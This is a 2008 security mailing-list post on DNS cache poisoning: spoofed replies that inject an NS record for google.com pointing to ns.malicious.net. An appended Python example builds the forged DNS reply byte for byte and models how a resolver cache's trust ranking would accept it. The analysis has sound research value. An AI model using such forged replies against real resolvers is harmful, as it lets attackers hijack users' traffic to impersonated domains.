Dailydave mailing list archives

Re: DNS Speculation


From: Cedric Blancher <blancher () cartel-securite fr>
Date: Wed, 23 Jul 2008 13:22:45 +0200

On Tuesday, 22 July 2008 at 02:42 -0700, Alexander Sotirov wrote:
> Spoofing an A record:
> Right before step 7, the attacker sends a spoofed response from ns.google.com
> that includes an A record for www.google.com and points it to 1.2.3.4 (which is
> an attacker controlled name server). If the attacker does not win the race,
> they just try again with 1235.google.com and so on.

And what about spoofing 1234.google.com as described everywhere and adding
an Authority RR stating that the NS record for google.com is
ns.malicious.net, and an Additional one giving the A record for
ns.malicious.net?

According to RFC 2181, section 5.4.1, authority data from an
authoritative answer have higher priority than those from a
non-authoritative one. When ns.isp.com gets the NS record from .com
(step 5), it is done through a non-authoritative answer. Therefore, our
successful spoofed answer should update the google.com NS record(s) in
the ns.isp.com cache.


-- 
http://sid.rstack.org/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
Hi! I'm your friendly neighbourhood signature virus.
Copy me to your signature file and help me spread!
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
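The following is an added example, not code from the thread or from any of its participants. It builds, byte for byte, the spoofed reply Cedric describes (a claimed-authoritative answer for 1234.google.com carrying an Authority NS record for google.com pointing at ns.malicious.net plus an Additional A record for ns.malicious.net) and then runs it through a toy resolver cache that applies the RFC 2181 section 5.4.1 trust ranking. The names google.com, ns.google.com, ns.malicious.net and the address 1.2.3.4 come from the thread; the address 192.0.2.10 for the real name server, the transaction id, the TTLs and the `bailiwick_check` knob are assumptions made for the demonstration. The bailiwick check is the caveat a practitioner would want: a resolver that only caches records inside the answering server's zone drops the out-of-zone glue for ns.malicious.net, but the in-bailiwick NS record for google.com still outranks the referral from .com, so whether the NS replacement happens is down to that ranking rather than to the glue.

```python
"""Added example (not from the thread): spoofed authority-section reply
and an RFC 2181 5.4.1 ranking model of a resolver cache."""
import struct


def rank(section, aa):
    """RFC 2181 5.4.1 trust rank of an RRset, lower = more trustworthy.
    answer/AA=1 -> 3, authority/AA=1 -> 4, answer/AA=0 -> 6,
    authority/AA=0 (a referral) -> 7, additional (glue) -> 7."""
    if section == "answer":
        return 3 if aa else 6
    if section == "authority":
        return 4 if aa else 7
    return 7


def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"


def encode_rr(name, rtype, rdata, ttl=3600):
    # NAME, TYPE, CLASS=IN, TTL, RDLENGTH, RDATA (no name compression)
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def build_spoofed_response(txid, qname, zone, evil_ns, evil_ip):
    """Reply that claims to come from the zone's server (QR=1, AA=1, RD=1, RA=1, NOERROR)."""
    header = struct.pack("!HHHHHH", txid, 0x8580, 1, 1, 1, 1)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)
    answer = encode_rr(qname, 1, ip_bytes(evil_ip))              # throwaway A for 1234.google.com
    authority = encode_rr(zone, 2, encode_name(evil_ns))          # NS google.com -> ns.malicious.net
    additional = encode_rr(evil_ns, 1, ip_bytes(evil_ip))         # glue A ns.malicious.net -> 1.2.3.4
    return header + question + answer + authority + additional


def decode_name(msg, off):
    labels = []
    while True:
        n = msg[off]; off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:  # compression pointer; not produced by build_spoofed_response
            ptr = ((n & 0x3F) << 8) | msg[off]
            return ".".join(labels + [decode_name(msg, ptr)[0]]), off + 1
        labels.append(msg[off:off + n].decode()); off += n


def parse_response(msg):
    """Return (txid, aa, {section: [(name, type, value), ...]})."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        _, off = decode_name(msg, off); off += 4
    sections = {}
    for sec, count in (("answer", an), ("authority", ns), ("additional", ar)):
        rrs = []
        for _ in range(count):
            name, off = decode_name(msg, off)
            rtype, _, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10]); off += 10
            rdata = msg[off:off + rdlen]; off += rdlen
            if rtype == 2:
                value = decode_name(msg, off - rdlen)[0]
            elif rtype == 1:
                value = ".".join(map(str, rdata))
            else:
                value = rdata
            rrs.append((name, rtype, value))
        sections[sec] = rrs
    return txid, bool(flags & 0x0400), sections


def in_bailiwick(owner, zone):
    owner, zone = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return owner == zone or owner.endswith("." + zone)


class Cache:
    def __init__(self):
        self.rrsets = {}  # (name, type) -> (rank, value)

    def learn(self, sections, aa, zone, bailiwick_check=True):
        """Cache each RR unless it is out of the answering server's zone or
        ranked lower than what is already cached (equal rank: newer wins,
        an implementation choice RFC 2181 leaves open)."""
        for sec, rrs in sections.items():
            for name, rtype, value in rrs:
                if bailiwick_check and not in_bailiwick(name, zone):
                    continue
                key = (name.lower(), rtype)
                r = rank(sec, aa)
                if key not in self.rrsets or r <= self.rrsets[key][0]:
                    self.rrsets[key] = (r, value)


def demo(bailiwick_check=True):
    cache = Cache()
    # Step 5 of the scenario: .com refers ns.isp.com to google.com's real server.
    # Non-authoritative reply, so the NS and its glue land at rank 7.
    referral = {"answer": [],
                "authority": [("google.com", 2, "ns.google.com")],
                "additional": [("ns.google.com", 1, "192.0.2.10")]}  # constructed address
    cache.learn(referral, aa=False, zone="com", bailiwick_check=bailiwick_check)
    # The attacker's spoofed reply, claiming to be ns.google.com (txid is assumed guessed).
    msg = build_spoofed_response(0x1234, "1234.google.com", "google.com", "ns.malicious.net", "1.2.3.4")
    _, aa, sections = parse_response(msg)
    cache.learn(sections, aa, zone="google.com", bailiwick_check=bailiwick_check)
    return {k: v[1] for k, v in cache.rrsets.items()}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

With the bailiwick check on, the google.com NS entry is replaced (rank 4 beats the referral's rank 7) while the ns.malicious.net glue is dropped; switching the check off caches the glue too, which is the outcome the post argues for.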